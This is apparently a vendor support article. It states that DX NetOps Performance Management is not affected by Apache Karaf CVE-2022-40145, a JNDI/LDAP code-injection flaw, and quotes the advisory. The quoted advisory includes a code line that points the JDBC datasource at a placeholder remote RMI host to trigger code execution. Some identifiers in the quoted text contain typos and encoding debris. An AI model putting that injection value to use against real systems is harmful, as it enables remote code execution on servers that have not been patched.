Is DX NetOps Performance Management affected by the Karaf vulnerability CVE-2022-40145 ?
Details on this vulnerability:
CVE-2022-40145: LDMP injection vulnerability in JDBC Login Module with JDK 8 Severity: Low Vendor: The Apache Software Foundation Versions Affected: all versions of Apache Karaf prior to 4.3.8 or 4.4.2 Description: This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering. An user can modifyÂ `options.put(JDBCUtils.DATASOURCE, "osgi:" +Â DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when aconfiguration uses a JNDI LDAP data source URI when an attacker hascontrol of the target LDAP server. This has been fixed in revision: https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341 https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1 Mitigation: Apache Karaf users should upgrade to 4.3.8 or 4.4.2 or later as soon as possible, or use correct path.
Release : 21.2.x - 22.2.x
NetOps Performance Management is not affected by this vulnerability as it doesn't use the vulnerable JDK 8 and JDBCUtils module.
In addition, NetOps Performance Management release 22.2.5 will have Karaf 4.3.8 delivered to address other vulnerabilities.
NetOps Performance Management is not affected by this vulnerability because it does not use the specific vulnerable modules, and also in release 22.2.5 will have Karaf upgraded to version 4.3.8 where this is fixed.